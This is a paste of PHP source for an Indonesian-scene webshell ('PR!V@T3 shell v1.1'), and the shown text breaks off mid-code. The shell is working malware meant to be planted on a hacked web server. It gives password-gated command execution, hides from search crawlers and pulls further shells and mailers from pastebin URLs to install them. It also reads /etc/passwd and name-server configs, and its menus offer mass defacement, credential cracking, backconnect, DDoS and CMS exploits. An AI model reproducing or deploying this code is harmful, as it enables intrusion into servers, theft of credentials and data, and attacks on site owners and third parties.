· 7 years ago · Oct 23, 2018, 05:44 PM
1<?php
2$auth_pass = "39d5b4a1417ba23b28b5a87aae5aa9c0"; // default: pr!v@t3
3session_start();
4error_reporting(0);
5set_time_limit(0);
6@set_magic_quotes_runtime(0);
7@clearstatcache();
8@ini_set('error_log',NULL);
9@ini_set('log_errors',0);
10@ini_set('max_execution_time',0);
11@ini_set('output_buffering',0);
12@ini_set('display_errors', 0);
13
14if(isset($_GET['bom'])){
15$color = "#00ff00";
16$default_action = 'Files';
17$default_use_ajax = true;
18$default_charset = 'UTF-8';
19if(!empty($_SERVER['HTTP_USER_AGENT'])) {
20 $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
21 if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
22 header('HTTP/1.0 404 Not Found');
23 exit;
24 }
25}
26
27function login_shell() {
28?>
29<html>
30<head>
31<title>PR!V@T3</title>
32<style type="text/css">
33html {
34 margin:0;
35 background-color: black;
36 color: green;
37 cursor:crosshair;
38}
39header {
40 color: green;
41 margin: 10px auto;
42 cursor:crosshair;
43}
44input[type=password] {
45 width: 250px;
46 height: 25px;
47 color: red;
48 background: #000000;
49 border: 1px solid #ffffff;
50 padding: 5px;
51 margin-left: 20px;
52 text-align: center;
53 cursor:crosshair;
54}
55#logo1{
56 text-align:center;
57 padding-left:50px;
58 color:red;
59}
60</style>
61</head>
62 <pre id="logo1"><strong>
63#
64# ,--. ,--. ,---.,-----.,--. ,--.,--------. ,---. ,------. ,-----.
65# | ,'.| | / || .--'| '--' |'--. .--' ,-----. ' .-' | .---'' .--./
66# | |' ' |/ ' |'--. `\| .--. | | | '-----' `. `-. | `--, | |
67# | | ` |'--| |.--' /| | | | | | .-' || `---.' '--'\
68# `--' `--' `--'`----' `--' `--' `--' `-----' `------' `-----'
69# ,--. ,--. ,--. ,--. ,--.,--. ,--. ,--.
70# | | | | ,---. | |-. ,---. | ,---. ,---. | || | ,--. ,--./ | / |
71# | |.'.| || .-. :| .-. '( .-' | .-. || .-. :| || | \ `' / `| | `| |
72# | ,'. |\ --.| `-' |.-' `)| | | |\ --.| || | \ / | |.--.| |
73# '--' '--' `----' `---' `----' `--' `--' `----'`--'`--' `--' `--''--'`--'
74#
75 </strong></pre>
76<form method="post">
77<center><input type="password" name="pass"><center>
78</form>
79<br>
80<center><?php echo " Copyright © ".date('Y')." - pr!v@t3"; ?></center>
81<?php
82exit;
83}
84if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
85 if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
86 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
87 else
88 login_shell();
89
90if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
91 @ob_clean();
92 $file = $_GET['file'];
93 header('Content-Description: File Transfer');
94 header('Content-Type: application/octet-stream');
95 header('Content-Disposition: attachment; filename="'.basename($file).'"');
96 header('Expires: 0');
97 header('Cache-Control: must-revalidate');
98 header('Pragma: public');
99 header('Content-Length: ' . filesize($file));
100 readfile($file);
101 exit;
102}
103?>
104<html>
105<head>
106<title>PR!V@T3</title>
107<meta name='name' content='PR!V@T3 shell v1.1'>
108<meta name='name' content='n45ht shell v1.1'>
109<meta name='author' content='FRU_403'>
110<meta name='author' content='FRU_403 From Storm Cyber Army - N45HT'>
111<meta name='info' content='IndoXploit WebShell Recoded By FRU_403'>
112<meta name='Thanks' content='Extreme Crew - Storm Cyber Army - IndoXploit - Mr.P-teo - BackBox Team - N45HT - iTeens - Defacer Tersakiti Team'>
113<meta charset="UTF-8">
114<style type='text/css'>
115html {
116 background-color:black;
117 font-family: 'Ubuntu';
118 font-size: 13px;
119 width: 100%;
120 cursor:crosshair;
121}
122li {
123 display: inline;
124 cursor:crosshair;
125}
126table, th, td {
127 border-collapse:collapse;
128 font-family: Tahoma, Geneva, sans-serif;
129 background: transparent;
130 cursor:crosshair;
131}
132.table_home, .th_home, .td_home {
133 border: 1px solid white;
134 cursor:crosshair;
135}
136th {
137 padding: 10px;
138 cursor:crosshair;
139}
140a {
141 color: white;
142 text-decoration: none;
143 cursor:crosshair;
144}
145a:hover {
146 color: white;
147 text-shadow: 0pt 1pt 0.1em rgb(255, 255, 255);
148 text-decoration:none;
149 cursor:crosshair;
150}
151b {
152 color: white;
153 cursor:crosshair;
154}
155input[type=text], input[type=password],input[type=submit] {
156 background: transparent;
157 color: white;
158 border: 1px solid white;
159 margin: 5px auto;
160 padding-left: 5px;
161 font-family: 'Ubuntu';
162 font-size: 13px;
163 cursor:crosshair;
164}
165textarea {
166 border: 1px solid white;
167 width: 100%;
168 height: 400px;
169 padding-left: 5px;
170 margin: 10px auto;
171 resize: none;
172 background: transparent;
173 color: white;
174 font-family: 'Ubuntu';
175 font-size: 13px;
176 cursor:crosshair;
177}
178select {
179 width: 152px;
180 background: #000000;
181 color: lime;
182 border: 1px solid white;
183 margin: 5px auto;
184 padding-left: 5px;
185 font-family: 'Ubuntu';
186 font-size: 13px;
187 cursor:crosshair;
188}
189option:hover {
190 background: lime;
191 color: #000000;
192 cursor:crosshair;
193}
194*{
195 text-shadow: 0pt 0pt 0.3em rgb(153, 153, 153);
196 font-size:11px;
197 font-family:Tahoma,Verdana,Arial;
198 color:white;
199 cursor:crosshair;
200}
201.mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid white; padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px white;-moz-box-shadow: 0px 4px 2px white;}
202.cgx2 {text-align: center;letter-spacing:1px;font-family: "orbitron";color: white;font-size:25px;text-shadow: 5px 5px 5px black;}
203.infoweb {
204 border-right: 1px solid green;
205 cursor:crosshair;
206}
207a:hover{
208 text-decoration:none;
209 cursor:crosshair;
210}
211div #menu li:hover {cursor:pointer;
212cursor:crosshair;
213}
214div#menu ul {
215 margin:1px 1px 1px 1px;padding:0;float:left;
216 cursor:crosshair;
217}
218div#menu li {
219 position:relative;display:block;float:left;
220 cursor:crosshair;
221}
222div#menu li:hover>ul {
223 left:0px;
224 cursor:crosshair;
225}
226div#menu a{
227 margin:1px 1px 1px 1px;padding:0;float:left;-moz-border-radius: 6px; border-radius: 12px; border:1px solid white;display:block;float:left;padding:4px 6px;margin:0 6px 0 0;text-decoration:none;letter-spacing:3px;color:white;
228 cursor:crosshair;
229}
230div#menu a:hover{
231 text-shadow: 0pt 1pt 0.1em rgb(255, 255, 255);
232 text-decoration:none;
233 cursor:crosshair;
234}
235div#menu ul ul {
236 margin:2px 1px 1px 1px;float:left;position:absolute;top:20px;left:-990em;width:140px;padding:5px 0 5px 0;background:none;
237 cursor:crosshair;
238}
239div#menu ul ul a {
240 margin-top:1px;padding:1px 1px 1px 1px;height:20px;float:none;display:block;color:white;
241 cursor:crosshair;
242}
243.output {
244 margin:auto;border:2px solid white;width:100%;height:400px;background:none;padding:0 2px;
245 cursor:crosshair;
246 }
247.cmdbox {
248 width:100%;
249 cursor:crosshair;
250}
251</style>
252</head>
253<?php
254
255function w($dir,$perm) {
256 if(!is_writable($dir)) {
257 return "<font color=red>".$perm."</font>";
258 } else {
259 return "<font color=lime>".$perm."</font>";
260 }
261}
262function r($dir,$perm) {
263 if(!is_readable($dir)) {
264 return "<font color=red>".$perm."</font>";
265 } else {
266 return "<font color=lime>".$perm."</font>";
267 }
268}
269function exe($cmd) {
270 if(function_exists('system')) {
271 @ob_start();
272 @system($cmd);
273 $buff = @ob_get_contents();
274 @ob_end_clean();
275 return $buff;
276 } elseif(function_exists('exec')) {
277 @exec($cmd,$results);
278 $buff = "";
279 foreach($results as $result) {
280 $buff .= $result;
281 } return $buff;
282 } elseif(function_exists('passthru')) {
283 @ob_start();
284 @passthru($cmd);
285 $buff = @ob_get_contents();
286 @ob_end_clean();
287 return $buff;
288 } elseif(function_exists('shell_exec')) {
289 $buff = @shell_exec($cmd);
290 return $buff;
291 }
292}
293function perms($file){
294 $perms = fileperms($file);
295 if (($perms & 0xC000) == 0xC000) {
296 // Socket
297 $info = 's';
298 } elseif (($perms & 0xA000) == 0xA000) {
299 // Symbolic Link
300 $info = 'l';
301 } elseif (($perms & 0x8000) == 0x8000) {
302 // Regular
303 $info = '-';
304 } elseif (($perms & 0x6000) == 0x6000) {
305 // Block special
306 $info = 'b';
307 } elseif (($perms & 0x4000) == 0x4000) {
308 // Directory
309 $info = 'd';
310 } elseif (($perms & 0x2000) == 0x2000) {
311 // Character special
312 $info = 'c';
313 } elseif (($perms & 0x1000) == 0x1000) {
314 // FIFO pipe
315 $info = 'p';
316 } else {
317 // Unknown
318 $info = 'u';
319 }
320 // Owner
321 $info .= (($perms & 0x0100) ? 'r' : '-');
322 $info .= (($perms & 0x0080) ? 'w' : '-');
323 $info .= (($perms & 0x0040) ?
324 (($perms & 0x0800) ? 's' : 'x' ) :
325 (($perms & 0x0800) ? 'S' : '-'));
326 // Group
327 $info .= (($perms & 0x0020) ? 'r' : '-');
328 $info .= (($perms & 0x0010) ? 'w' : '-');
329 $info .= (($perms & 0x0008) ?
330 (($perms & 0x0400) ? 's' : 'x' ) :
331 (($perms & 0x0400) ? 'S' : '-'));
332 // World
333 $info .= (($perms & 0x0004) ? 'r' : '-');
334 $info .= (($perms & 0x0002) ? 'w' : '-');
335 $info .= (($perms & 0x0001) ?
336 (($perms & 0x0200) ? 't' : 'x' ) :
337 (($perms & 0x0200) ? 'T' : '-'));
338 return $info;
339}
340function hdd($s) {
341 if($s >= 1073741824)
342 return sprintf('%1.2f',$s / 1073741824 ).' GB';
343 elseif($s >= 1048576)
344 return sprintf('%1.2f',$s / 1048576 ) .' MB';
345 elseif($s >= 1024)
346 return sprintf('%1.2f',$s / 1024 ) .' KB';
347 else
348 return $s .' B';
349}
350function ambilKata($param, $kata1, $kata2){
351 if(strpos($param, $kata1) === FALSE) return FALSE;
352 if(strpos($param, $kata2) === FALSE) return FALSE;
353 $start = strpos($param, $kata1) + strlen($kata1);
354 $end = strpos($param, $kata2, $start);
355 $return = substr($param, $start, $end - $start);
356 return $return;
357}
358function getsource($url) {
359 $curl = curl_init($url);
360 curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
361 curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
362 curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
363 curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
364 $content = curl_exec($curl);
365 curl_close($curl);
366 return $content;
367}
368function bing($dork) {
369 $npage = 1;
370 $npages = 30000;
371 $allLinks = array();
372 $lll = array();
373 while($npage <= $npages) {
374 $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
375 if($x) {
376 preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
377 foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
378 $npage = $npage + 10;
379 if (preg_match("(first=" . $npage . "&)siU", $x, $linksuiv) == 0) break;
380 } else break;
381 }
382 $URLs = array();
383 foreach($allLinks as $url){
384 $exp = explode("/", $url);
385 $URLs[] = $exp[2];
386 }
387 $array = array_filter($URLs);
388 $array = array_unique($array);
389 $sss = count(array_unique($array));
390 foreach($array as $domain) {
391 echo $domain."\n";
392 }
393}
394function reverse($url) {
395 $ch = curl_init("http://domains.yougetsignal.com/domains.php");
396 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
397 curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
398 curl_setopt($ch, CURLOPT_HEADER, 0);
399 curl_setopt($ch, CURLOPT_POST, 1);
400 $resp = curl_exec($ch);
401 $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
402 $array = explode(",,", $resp);
403 unset($array[0]);
404 foreach($array as $lnk) {
405 $lnk = "http://$lnk";
406 $lnk = str_replace(",", "", $lnk);
407 echo $lnk."\n";
408 ob_flush();
409 flush();
410 }
411 curl_close($ch);
412}
413if(get_magic_quotes_gpc()) {
414 function ec_ss($array) {
415 return is_array($array) ? array_map('ec_ss', $array) : stripslashes($array);
416 }
417 $_POST = ec_ss($_POST);
418 $_COOKIE = ec_ss($_COOKIE);
419}
420function BuatTools($names,$lokasi){
421 if ( $_GET['create'] == $names ){
422 $a= "".$_SERVER['SERVER_NAME']."";
423$b= dirname($_SERVER['PHP_SELF']);
424$c = "/priv_tools/".$names.".php";
425if (file_exists('priv_tools/'.$names.'.php')){
426 echo '<script type="text/javascript">alert("Done");window.location.href = "priv_tools/'.$names.'.php";</script> ';
427 }
428 else {mkdir("priv_tools", 0777);
429file_put_contents('priv_tools/'.$names.'.php', file_get_contents($lokasi));
430echo ' <script type="text/javascript">alert("Done");window.location.href = "priv_tools/'.$names.'.php";</script> ';}}}
431
432BuatTools("wso","http://pastebin.com/raw/3eh3Gej2");
433BuatTools("adminer"."https://www.adminer.org/static/download/4.2.5/adminer-4.2.5.php");
434BuatTools("b374k","http://pastebin.com/raw/rZiyaRGV");
435BuatTools("injection","http://pastebin.com/raw/nxxL8c1f");
436BuatTools("promailerv2","http://pastebin.com/raw/Rk9v6eSq");
437BuatTools("gamestopceker","http://pastebin.com/raw/QSnw1JXV");
438BuatTools("bukapalapak","http://pastebin.com/raw/6CB8krDi");
439BuatTools("tokopedia","http://pastebin.com/dvhzWgby");
440BuatTools("encodedecode","http://pastebin.com/raw/wqB3G5eZ");
441BuatTools("mailer","http://pastebin.com/raw/9yu1DmJj");
442BuatTools("r57","http://pastebin.com/raw/G2VEDunW");
443BuatTools("tokenpp","http://pastebin.com/raw/72xgmtPL");
444BuatTools("extractor","http://pastebin.com/raw/jQnMFHBL");
445BuatTools("bh","http://pastebin.com/raw/3L2ESWeu");
446BuatTools("dhanus","http://pastebin.com/raw/v4xGus6X");
447
448if(isset($_GET['folder'])) {
449 $dir = $_GET['folder'];
450 chdir($dir);
451} else {
452 $dir = getcwd();
453}
454$kernel = php_uname();
455$ip = gethostbyname($_SERVER['HTTP_HOST']);
456$dir = str_replace("\\","/",$dir);
457$scdir = explode("/", $dir);
458$freespace = hdd(disk_free_space("/"));
459$total = hdd(disk_total_space("/"));
460$used = $total - $freespace;
461$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
462$ds = @ini_get("disable_functions");
463$mysql = (function_exists('mysql_connect')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
464$curl = (function_exists('curl_version')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
465$wget = (exe('wget --help')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
466$perl = (exe('perl --help')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
467$python = (exe('python --help')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
468$show_ds = (!empty($ds)) ? "<font style='color:red'>$ds</font>" : "<font style='color:lime'>ON</font>";
469if(!function_exists('posix_getegid')) {
470 $user = @get_current_user();
471 $uid = @getmyuid();
472 $gid = @getmygid();
473 $group = "?";
474} else {
475 $uid = @posix_getpwuid(posix_geteuid());
476 $gid = @posix_getgrgid(posix_getegid());
477 $user = $uid['name'];
478 $uid = $uid['uid'];
479 $group = $gid['name'];
480 $gid = $gid['gid'];
481}
482$d0mains = @file("/etc/named.conf");
483 $users=@file('/etc/passwd');
484 if($d0mains)
485 {
486 $count;
487 foreach($d0mains as $d0main)
488 {
489 if(@ereg("zone",$d0main))
490 {
491 preg_match_all('#zone "(.*)"#', $d0main, $domains);
492 flush();
493 if(strlen(trim($domains[1][0])) > 2)
494 {
495 flush();
496 $count++;
497 }
498 }
499 }
500 }
501$port=$_SERVER['SERVER_PORT'];
502echo "<table>";
503echo "<td class=infoweb>";
504echo "System: <font color=lime>".$kernel."</font><br>";
505echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
506echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
507echo "Websites :<font color=lime> $count </font> Domains <br>";
508echo "Port :<font color=lime> $port</font> <br>";
509echo "Safe Mode: $sm<br>";
510echo "Disable Functions: $show_ds<br>";
511echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
512echo "Current DIR: ";
513foreach($scdir as $c_dir => $cdir) {
514 echo "<a href='?bom&folder=";
515 for($i = 0; $i <= $c_dir; $i++) {
516 echo $scdir[$i];
517 if($i != $c_dir) {
518 echo "/";
519 }
520 }
521 echo "'>$cdir</a>/";
522}
523echo " [ ".w($dir, perms($dir))." ]";
524echo "</td><td style='width:13.5%'>";
525echo " Server IP: <font color=lime>".$ip."</font><br> Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font>";
526echo "<br><br>";
527echo " <a href='?bom' style='border:1px solid white;width:80px;padding:0px 8px 0px 8px;'>H O M E</a>
528 <a href='?bom&do=kill' style='border:1px solid white;width:80px;padding:0px 8px 0px 8px;'>K I L L </a>
529 <a href='?bom&logout=true' style='color:red;border:1px solid white;width:90px;margin:0px;padding:0px 8px 0px 8px;'>LOGOUT</a>
530  ";
531echo "</td></table>";
532echo "<hr>";
533echo "
534<table>
535<tr>
536<div id='menu'>
537 <ul class=menu>
538 <li><a href='?bom&folder=$dir'>Files</a></li>
539 <li><a href='?bom&folder=$dir&do=cmd'>Command</a></li>
540 <li><a>Config & Symlink</a>
541 <ul>
542 <li><a href='?bom&folder=$dir&do=config' style='background-color:black'> Config</a></li>
543 <li><a href='?bom&folder=$dir&do=lcf' style='background-color:black'> LiteSpeed</a></li>
544 <li><a href='?bom&folder=$dir&do=convh' style='background-color:black'> Config vhosts</a></li>
545 <li><a href='?bom&folder=$dir&do=symser' style='background-color:black'> Symlink Server</a></li>
546 </ul>
547 </li>
548 <li><a>Mass</a>
549 <ul>
550 <li><a href='?bom&folder=$dir&do=mass_mail' style='background:black'> Mass Mailer</a></li>
551 <li><a href='?bom&folder=$dir&do=mass_deface' style='background:black'> Mass Deface</a></li>
552 <li><a href='?bom&folder=$dir&do=mass_helper' style='background:black'> Mass Helper</a></li>
553 <li><a href='?bom&folder=$dir&do=mass_delete' style='background:black'> Mass Delete</a></li>
554 </ul>
555 </li>
556 <li><a href='?bom&folder=$dir&do=domains'>Domains</a></li>
557 <li><a href='?bom&folder=$dir&do=upload'>Upload</a></li>
558 <li><a>Grab/Crack</a>
559 <ul>
560 <li><a href='?bom&folder=$dir&do=cpanel' style='background-color:black'> Cpanel Cracker</a></li>
561 <li><a href='?bom&folder=$dir&do=smtp' style='background-color:black'> SMTP Grabber</a></li>
562 </ul>
563 </li>
564 <li><a>Bypass</a>
565 <ul>
566 <li><a href='?bom&folder=$dir&do=etcpler' style='background-color:black'> etc/passw</a></li>
567 <li><a href='?bom&folder=$dir&do=bypass' style='background-color:black'> Disable Functions</a></li>
568 </ul>
569 </li>
570 <li><a>Auto Tools</a>
571 <ul>
572 <li><a href='?bom&folder=$dir&do=auto_edit_user' style='background-color:black'> Auto Edit User</a></li>
573 <li><a href='?bom&folder=$dir&do=auto_wp' style='background-color:black'> Auto WordPress</a></li>
574 <li><a href='?bom&folder=$dir&do=auto_dwp' style='background-color:black'> Auto Deface WP</a></li>
575 <li><a href='?bom&folder=$dir&do=auto_dwp2' style='background-color:black'> Deface WP v.2</a></li>
576 </ul>
577 </li>
578 <li><a>Tools</a>
579 <ul>
580 <li><a href='?bom&folder=$dir&do=fake_root' style='background-color:black'> Fake Root</a></li>
581 <li><a href='?bom&folder=$dir&do=network' style='background-color:black'> Backconnect</a></li>
582 <li><a href='?bom&folder=$dir&do=mysql' style='background-color:black'> Mysql Interface</a></li>
583 <li><a href='?bom&folder=$dir&do=adminer' style='background-color:black'> Adminer</a></li>
584 <li><a href='?bom&folder=$dir&do=cgi' style='background-color:black'> Cgi Telnet</a></li>
585 <li><a href='?bom&folder=$dir&do=zoneh' style='background-color:black'> Zone-H</a></li>
586 <li><a href='?bom&folder=$dir&do=defacerid' style='background-color:black'> Defacer.id</a></li>
587 </ul>
588 <li><a>Tools V2</a>
589 <ul>
590 <li><a href='?bom&folder=$dir&do=boom' style='background-color:black'> Ngindex</a></li>
591 <li><a href='?bom&folder=$dir&do=jumping' style='background-color:black'> Jumping</a></li>
592 <li><a href='?bom&folder=$dir&do=ddos' style='background-color:black'> DDOS Attack</a></li>
593 <li><a href='?bom&folder=$dir&do=lh' style='background-color:black'> Log Hunter</a></li>
594 <li><a href='?bom&folder=$dir&do=sc' style='background-color:black'> Shell Checker</a></li>
595 <li><a href='?bom&folder=$dir&do=sf' style='background-color:black'> Shell Finder</a></li>
596 </ul>
597 </li>
598 <li><a href='?bom&folder=$dir&do=rdp'>Create RDP</a></li>
599 <li><a>Exploit</a>
600 <ul>
601 <li><a href='?bom&folder=$dir&do=lokmed_login_shell' style='background-color:black'> Lokomedia</a></li>
602 <li><a href='?bom&folder=$dir&do=sqli_scanner' style='background-color:black'> SQLI Scanner</a></li>
603 <li><a href='?bom&folder=$dir&do=popoji_add_admin' style='background-color:black'> Popoji</a></li>
604 <li><a href='?bom&folder=$dir&do=tevolution' style='background-color:black'> Tevolution</a></li>
605 <li><a href='?bom&folder=$dir&do=u-design_exploit' style='background-color:black'> U-Design</a></li>
606 <li><a href='?bom&folder=$dir&do=u-design_dorker' style='background-color:black'> U-Design Dorker</a></li>
607 <li><a href='?bom&folder=$dir&do=magento' style='background-color:black'> Magento</a></li>
608 </ul>
609 </li>
610 <li><a>Exploits</a>
611 <ul>
612 <li><a href='?bom&folder=$dir&do=drupal' style='background-color:black'> Drupal Mass</a></li>
613 <li><a href='?bom&folder=$dir&do=binchecker' style='background-color:black'> Checker</a></li>
614 </ul>
615 </li>
616 <li><a>Encrypter</a>
617 <ul>
618 <li><a href='?bom&folder=$dir&do=hash' style='background-color:black'> Hash</a></li>
619 <li><a href='?bom&folder=$dir&do=string' style='background-color:black'> Encoder&Decoder</a></li>
620 </ul>
621 </li>
622 <li><a href='?bom&folder=$dir&do=tentang' style='background-color:black'> About</a></li>
623 </ul>
624 </div></tr><br><br>";
625 echo "<hr>";
626 echo "<table>";
627if($_GET['logout'] == true) {
628 unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
629 echo "<script>window.location='?';</script>";
630} elseif($_GET['do'] == 'upload') {
631 echo "<center>";
632 if($_POST['upload']) {
633 if($_POST['tipe_upload'] == 'biasa') {
634 if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
635 $act = "<br><font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
636 } else {
637 $act = "<font color=red>failed to upload file</font>";
638 }
639 } else {
640 $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
641 $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
642 if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
643 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
644 $act = "<br><font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
645 } else {
646 $act = "<font color=red>failed to upload file</font>";
647 }
648 } else {
649 $act = "<font color=red>failed to upload file</font>";
650 }
651 }
652 }
653 echo "Upload File:
654 <form method='post' enctype='multipart/form-data'>
655 <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
656 <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
657 <input type='file' name='ix_file'>
658 <input type='submit' value='upload' name='upload'>
659 </form>";
660 echo $act;
661 echo "</center>";
662} elseif($_GET['do'] == 'kill') {
663 if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
664 die('<center><br><center><h2>Shell removed</h2><br>Goodbye , Thanks for take my shell today</center></center>');
665 else
666 echo '<center>unlink failed!</center>';
667} elseif($_GET['do'] == 'mysql'){if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])){$sqlhost = $_GET['sqlhost'];$sqluser = $_GET['sqluser'];$sqlpass = $_GET['sqlpass'];$sqlport = $_GET['sqlport'];if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){$msg .= "<div style='width:99%;padding:4px 10px 0 10px;'>";$msg .= "<p>Connected to ".$sqluser."<span class='gaya'>@</span>".$sqlhost.":".$sqlport;$msg .= " <span class='gaya'>-></span> <a href='?bom&folder=".$dir."&do=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&'>[ databases ]</a>";if(isset($_GET['db'])) $msg .= " <span class='gaya'>-></span> <a href='?bom&folder=".$dir."&do=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET['db']."'>".htmlspecialchars($_GET['db'])."</a>";if(isset($_GET['table'])) $msg .= " <span class='gaya'>-></span> <a href='?bom&folder=".$dir."&do=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET['db']."&table=".$_GET['table']."'>".htmlspecialchars($_GET['table'])."</a>";$msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>";$msg .= "</div>";echo $msg;if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){$db = $_GET['db'];$query = "DROP TABLE IF EXISTS b374k_table;\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE '/etc/passwd'\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\nDROP TABLE IF EXISTS b374k_table;";$msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'><input type='hidden' name='y' value='".$dir."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>$query</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";$tables = array();$msg .= "<table class='explore' style='width:99%;'><tr><th>available tables on ".$db."</th></tr>";$hasil = @mysql_list_tables($db,$con);
668while(list($table) = @mysql_fetch_row($hasil)){@array_push($tables,$table);} @sort($tables);
669foreach($tables as $table){$msg .= "<tr><td><a href='?bom&folder=".$dir."&do=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."&table=".$table."'>$table</a></td></tr>";} $msg .= "</table>";}
670elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))){
671$db = $_GET['db'];$table = $_GET['table'];$query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;";$msgq = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$dir."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <input type='hidden' name='table' value='".$table."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";$columns = array();$msg = "<table class='explore' style='width:99%;'>";$hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table);while(list($column) = @mysql_fetch_row($hasil)){$msg .= "<th>$column</th>";$kolum = $column;}$msg .= "</tr>";$hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table);
672list($total) = mysql_fetch_row($hasil);
673if(isset($_GET['z'])) $page = (int) $_GET['z'];
674else $page = 1;$pagenum = 100;$totpage = ceil($total / $pagenum);$start = (($page - 1) * $pagenum);$hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum);
675while($datas = @mysql_fetch_assoc($hasil)){$msg .= "<tr>";foreach($datas as $data){if(trim($data) == "")
676$data = " ";$msg .= "<td>$data</td>";}$msg .= "</tr>";} $msg .= "</table>";$head = "<div style='padding:10px 0 0 6px;'> <form action='?' method='get'> <input type='hidden' name='y' value='".$dir."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <input type='hidden' name='table' value='".$table."' /> Page <select class='inputz' name='z' onchange='this.form.submit();'>";
677for($i = 1;$i <= $totpage;$i++){$head .= "<option value='".$i."'>".$i."</option>";
